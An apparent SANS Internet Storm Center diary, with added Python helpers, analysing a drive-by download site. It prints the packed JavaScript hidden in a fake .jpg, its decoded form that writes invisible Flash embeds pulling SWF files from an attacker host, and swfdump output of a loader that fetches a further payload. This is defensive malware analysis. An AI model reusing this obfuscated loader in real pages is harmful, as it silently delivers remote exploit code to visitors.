Tuesday, May 27, 2008 3:31 PM cmosby

Malicious swf files? - SANS Internet Storm Center

Published: 2008-05-27,
Last Updated: 2008-05-27 18:46:44 UTC
by Adrien de Beaupre (Version: 2)

Marco and Eric wrote in to let us know of a potentially malicious site found at

hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/07.jpg

The JPG file is actually a script, shown below:

window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};
if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};
while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}(
'n(2.q.k("i=")==-1){E 5=F D();5.C(5.G()+12*j*j*B);2.q="i=K;J=/;5="+5.I();n(L.y.t().k("s")>0){2.3(\'<r A="z:u-x-v-w-H" Y="6://15.14.9/13/10/11/17/18.M#1a=4,0,19,0" l="0" m="0" 16="Z">\');2.3(\'<8 7="R" a="Q"/>\');2.3(\'<8 7="P" a="6://g.h.9/e/f/d/b/p.c"/>\');2.3(\'<8 7="N" a="O"/>\');2.3(\'<8 7="S" a="#T"/>\');2.3(\'<X o="6://g.h.9/e/f/d/b/p.c"/>\');2.3(\'</r>\')}W{2.3("<V o=6://g.h.9/e/f/d/b/U.c l=0 m=0>")}}',
62,73,
'||document|write||expires|http|name|param|com|value|20080311cPxl31|swf|ff11us|pcd|topics|www|play0nlnie|playon|60|indexOf|width|height|if|src|07|cookie|object|msie|toLowerCase|d27cdb6e|11cf|96b8|ae6d|userAgent|clsid|classid|1000|setTime|Date|var|new|getTime|444553540000|toGMTString|path|Yes|navigator|cab|quality|high|movie|sameDomain|allowScriptAccess|bgcolor|ffffff|08|EMBED|else|embed|codebase|middle|shockwave|cabs||pub|macromedia|download|align|flash|swflash||version'.split('|'),0,{}))

Using spidermonkey, it decodes to:

if(document.cookie.indexOf("playon=")==-1){
  var expires=new Date();
  expires.setTime(expires.getTime()+12*60*60*1000);
  document.cookie="playon=Yes;path=/;expires="+expires.toGMTString();
  if(navigator.userAgent.toLowerCase().indexOf("msie")>0){
    document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0" width="0" height="0" align="middle">');
    document.write('<param name="allowScriptAccess" value="sameDomain"/>');
    document.write('<param name="movie" value="hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/07.swf"/>');
    document.write('<param name="quality" value="high"/>');
    document.write('<param name="bgcolor" value="#ffffff"/>');
    document.write('<embed src="hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/07.swf"/>');
    document.write('</object>')
  }else{
    document.write("<EMBED src=hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/08.swf width=0 height=0>")
  }
}
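The same decoding can be done statically, without handing the script to a JavaScript engine. The following is an added example (not the diary's code and not spidermonkey): a re-implementation of the "p,a,c,k,e,d" unpacker the script uses, fed the packed payload and dictionary exactly as they appear above. The function names are mine.

```python
import re

# Added example: static re-implementation of the Dean Edwards "p,a,c,k,e,d" unpacker,
# so the packed script above can be decoded without evaluating any of it.

def encode(c: int, a: int = 62) -> str:
    """Mirror the packer's e(): dictionary index -> short token in base a."""
    head = "" if c < a else encode(c // a, a)
    c %= a
    # digits 0-9a-z for values below 36, then A-Z (chr(36 + 29) == "A")
    return head + (chr(c + 29) if c > 35 else "0123456789abcdefghijklmnopqrstuvwxyz"[c])

def unpack(p: str, a: int, c: int, words: list) -> str:
    """Replace every word token in p by its dictionary entry, as the eval'd loop does."""
    table = {}
    for i in range(c):
        token = encode(i, a)
        table[token] = words[i] or token   # empty slot: the token stands for itself ("12", "0")
    return re.sub(r"\w+", lambda m: table.get(m.group(0), m.group(0)), p, flags=re.ASCII)

# Packed payload and dictionary copied from the diary; split across lines only for
# readability (Python joins adjacent string literals).
PACKED = (
    'n(2.q.k("i=")==-1){E 5=F D();5.C(5.G()+12*j*j*B);2.q="i=K;J=/;5="+5.I();'
    'n(L.y.t().k("s")>0){2.3(\'<r A="z:u-x-v-w-H" Y="6://15.14.9/13/10/11/17/18.M'
    '#1a=4,0,19,0" l="0" m="0" 16="Z">\');2.3(\'<8 7="R" a="Q"/>\');'
    '2.3(\'<8 7="P" a="6://g.h.9/e/f/d/b/p.c"/>\');2.3(\'<8 7="N" a="O"/>\');'
    '2.3(\'<8 7="S" a="#T"/>\');2.3(\'<X o="6://g.h.9/e/f/d/b/p.c"/>\');'
    '2.3(\'</r>\')}W{2.3("<V o=6://g.h.9/e/f/d/b/U.c l=0 m=0>")}}'
)
WORDS = (
    "||document|write||expires|http|name|param|com|value|20080311cPxl31|swf|"
    "ff11us|pcd|topics|www|play0nlnie|playon|60|indexOf|width|height|if|src|07|"
    "cookie|object|msie|toLowerCase|d27cdb6e|11cf|96b8|ae6d|userAgent|clsid|"
    "classid|1000|setTime|Date|var|new|getTime|444553540000|toGMTString|path|Yes|"
    "navigator|cab|quality|high|movie|sameDomain|allowScriptAccess|bgcolor|ffffff|"
    "08|EMBED|else|embed|codebase|middle|shockwave|cabs||pub|macromedia|download|"
    "align|flash|swflash||version"
).split("|")

def decode_diary_script() -> str:
    """Decode the diary's packed script; compare with the spidermonkey output above."""
    return unpack(PACKED, 62, 73, WORDS)

if __name__ == "__main__":
    print(decode_diary_script())
```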

Let's get the swf files and see what they do; wget works.
file 07.swf
07.swf: Macromedia Flash data (compressed), version 9
file 08.swf
08.swf: Macromedia Flash data (compressed), version 9

Virustotal shows 0/32 for both files.

Swftools can show us what the swf files do:
swfdump -D 08.swf
[HEADER]        File version: 9
[HEADER]        File is zlib compressed. Ratio: 96%
[HEADER]        File size: 208 (Depacked)
[HEADER]        Frame rate: 12.000000
[HEADER]        Frame count: 1
[HEADER]        Movie width: 1.00
[HEADER]        Movie height: 1.00
[045]         4 FILEATTRIBUTES
[009]         3 SETBACKGROUNDCOLOR (ff/ff/ff)
[018]        31 PROTECT
[00c00c]       138 DOACTION
                 (   99 bytes) action: Constantpool(5 entries) String:"flashVersion" String:"/:$version" String:"http://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/" String:"ff.swf" String:"_root"
                 (    4 bytes) action: Push Lookup:0 ("flashVersion") Lookup:1 ("/:$version")
                 (    0 bytes) action: GetVariable
                 (    0 bytes) action: DefineLocal
                 (    4 bytes) action: Push Lookup:2 ("http://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/") Lookup:0 ("flashVersion")
                 (    0 bytes) action: GetVariable
                 (    0 bytes) action: Add2
                 (    2 bytes) action: Push Lookup:3 ("ff.swf")
                 (    0 bytes) action: Add2
                 (    2 bytes) action: Push Lookup:4 ("_root")
                 (    0 bytes) action: GetVariable
                 (    1 bytes) action: GetUrl2 64
                 (    0 bytes) action: Stop
                 (    0 bytes) action: End
[001]         0 SHOWFRAME 1 (00:00:00,000)
[000]         0 END
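What swfdump is showing there is the SWF tag stream, with the ActionScript bytecode of the DOACTION tag decoded. The following is an added example (not the diary's code and not part of swftools) that walks that structure and reports the constant-pool strings and whether a GetURL2 follows. Because the original files are not available, it builds its own constructed sample with a placeholder URL; all names are mine.

```python
import struct
import zlib

# Added example: a minimal SWF tag walker that reports what swfdump shows for 08.swf above
# (DOACTION constant-pool strings and whether a GetURL2 follows) over a constructed sample.

DOACTION, CONSTANTPOOL, GETURL2 = 12, 0x88, 0x9A   # SWF tag code, ActionScript opcodes

def swf_tags(data: bytes):
    """Yield (tag code, tag body) for a CWS (zlib-compressed) or FWS (plain) SWF."""
    body = zlib.decompress(data[8:]) if data[:3] == b"CWS" else data[8:]
    nbits = body[0] >> 3                                 # RECT field width (5 bits)
    pos = (5 + 4 * nbits + 7) // 8 + 4                   # skip RECT, frame rate, frame count
    while pos < len(body):
        hdr, = struct.unpack_from("<H", body, pos); pos += 2
        code, length = hdr >> 6, hdr & 0x3F
        if length == 0x3F:                               # long tag header
            length, = struct.unpack_from("<I", body, pos); pos += 4
        yield code, body[pos:pos + length]
        pos += length
        if code == 0:                                    # END tag
            break

def doaction_report(data: bytes):
    """Return (constant-pool strings, GetURL2 seen) across all DOACTION tags."""
    strings, geturl2 = [], False
    for body in (b for c, b in swf_tags(data) if c == DOACTION):
        pos = 0
        while pos < len(body) and body[pos] != 0:        # 0x00 = ActionEnd
            op = body[pos]; pos += 1
            length = 0
            if op >= 0x80:                               # opcodes >= 0x80 carry a length
                length, = struct.unpack_from("<H", body, pos); pos += 2
            payload = body[pos:pos + length]; pos += length
            if op == CONSTANTPOOL:
                count, = struct.unpack_from("<H", payload, 0)
                strings += [s.decode() for s in payload[2:].split(b"\x00")[:count]]
            elif op == GETURL2:
                geturl2 = True
    return strings, geturl2

def build_sample_swf() -> bytes:
    """Constructed sample: ConstantPool(url, "ff.swf"), GetURL2 (method flag 64), Stop."""
    pool = b"http://example.invalid/path/\x00ff.swf\x00"
    actions = (bytes([CONSTANTPOOL]) + struct.pack("<HH", len(pool) + 2, 2) + pool
               + bytes([GETURL2]) + struct.pack("<H", 1) + b"\x40" + b"\x07\x00")
    tags = (struct.pack("<H", (69 << 6) | 4) + b"\0\0\0\0"             # FILEATTRIBUTES
            + struct.pack("<H", (9 << 6) | 3) + b"\xff\xff\xff"         # SETBACKGROUNDCOLOR
            + struct.pack("<HI", (DOACTION << 6) | 0x3F, len(actions)) + actions
            + struct.pack("<HH", 1 << 6, 0))                            # SHOWFRAME, END
    body = b"\x00" + struct.pack("<HH", 12 << 8, 1) + tags              # empty RECT, 12 fps, 1 frame
    return b"CWS" + bytes([9]) + struct.pack("<I", 8 + len(body)) + zlib.compress(body)
```

Run on a real file, the same report flags a loader like 08.swf (URL and filename in the pool, a GetURL2 right after) without executing it in a player.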

Running the swf files in a web browser gives me the following URLs:
hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/WIN%206,0,79,0ff.swf
and
hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/WIN%206,0,79,0ie.swf
Both of which got me a big fat 404.
Either the final files have been removed, or the loader is looking for a different version of the player (the player version string is part of the requested URL).

Thanks to Bojan and Jeremy for their help!

It is unknown at this time whether these SWF files are related to this vulnerability.

Cheers,
Adrien de Beaupre
Bell Canada

Keywords: malware swf
